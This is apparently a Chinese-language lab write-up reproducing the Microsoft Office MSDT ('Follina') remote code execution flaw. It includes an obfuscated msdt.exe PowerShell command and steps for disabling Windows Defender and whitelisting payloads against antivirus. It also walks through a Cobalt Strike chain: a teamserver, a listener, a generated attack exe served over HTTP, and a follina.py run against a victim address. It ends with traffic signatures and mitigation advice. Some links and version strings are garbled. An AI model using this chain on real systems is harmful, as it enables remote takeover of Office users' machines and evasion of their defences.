目录
0x01 声明:
0x02 简介:
0x03 漏洞概述:
0x04 影响版本:
0x05 环境搭建:
0x06 漏洞复现:
是否存在利用点:
CMD执行:
生成docx文件利用:
0x07 CS上线:
启动CS服务端:
CS客户端连接:
设置监听:
生成攻击exe:
宿主机启动8080服务:
利用POC
修改POC:
启动POC
文件放到Windows 10虚拟机
宿主机日志:
CS客户端上线:
0x08 流量分析:
MSDT流量:
0x09 修复建议:
0x01 声明:
仅供学习参考使用,请勿用作违法用途,否则后果自负。
0x02 简介:
Microsoft Office 是由 Microsoft (微软)公司开发的一套办公软件套装。常用组件有 Word、Excel、PowerPoint 等。
0x03 漏洞概述:
Microsoft Office 存在远程代码执行漏洞,攻击者可通过恶意 Office 文件中远程模板功能从服务器获取恶意 HTML 文件,通过 'ms-msdt' URI 来执行恶意 PowerShell 代码。另外,该漏洞在宏被禁用的情况下,仍能通过 MSDT(Microsoft Support Diagnostics Tool)功能执行代码,当恶意文件保存为 RTF 格式时,甚至无需打开文件,通过资源管理器中的预览选项卡即可在目标机器上执行任意代码。
0x04 影响版本:
Microsoft Office 、Microsoft Office (其他版本有待确认)
0x05 环境搭建:
Windows 10虚拟机(一定要把Windows Defender关闭)
参考这篇文章:
彻底关闭Windows Defender&Windows 更新_Evan Kang的博客-CSDN博客
Windows 10 宿主机
Kali 虚拟机
POC1:
/chvancooten/follina.py/download/qq_44281295/86727749?spm=1001..3001.5501
POC2:
/JohnHammond/msdt-follina/download/qq_44281295/86727749?spm=1001..3001.5501
0x06 漏洞复现:
是否存在利用点:
CMD执行:
msdt.exe /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"
生成docx文件利用:
0x07 CS上线:
启动CS服务端:
chmod +x teamserver
./teamserver ip key(key为密钥,客户端连接时候使用)
CS客户端连接:
设置监听:
点击“Cobalt Strike”–“Listeners”—“Add”—输入“ Name” —添加“HTTP Hosts”—点击“Save”
生成攻击exe:
点击“Attacks”—“Packages”—“Windows Executable”—点击“…”—选择“test”—点击“Generate”—选择一个路径存放exe(注意加白,会被杀。)
宿主机启动8080服务:
主要目的是让被害主机从这个服务上下载CS生成的exe。
python -m http.server 8080
利用POC
POC地址:xxx
修改POC:
启动POC
python follina.py -i 192.168.18.130 -p 8000 -r 6000
文件放到Windows 10虚拟机
(注意加白,会被杀软干掉。)
宿主机日志:
宿主机8080会收到一条下载成功的日志
CS客户端上线:
0x08 流量分析:
(请求CS生成exe应该在VPS上的,测试环境中在攻击者这边生成比较方便)
MSDT流量:
在流量分析中,发现只会有几种请求头:
User-Agent: Microsoft Office Protocol Discovery
User-Agent: Microsoft Office Word
Mozilla/4.0 (compatible; ms-office; MSOffice 16)
伴随着的请求方式有:
HEAD请求路径为 “/index.html”
OPTIONS请求路径为 “/”
0x09 修复建议:
目前可参考官方文档禁用 MSDT URL 协议或通过 Microsoft Defender 检测和保护系统。
https://msrc-//05/30/guidance-for-cve--30190-microsoft-support-diagnostic-tool-vulnerability/
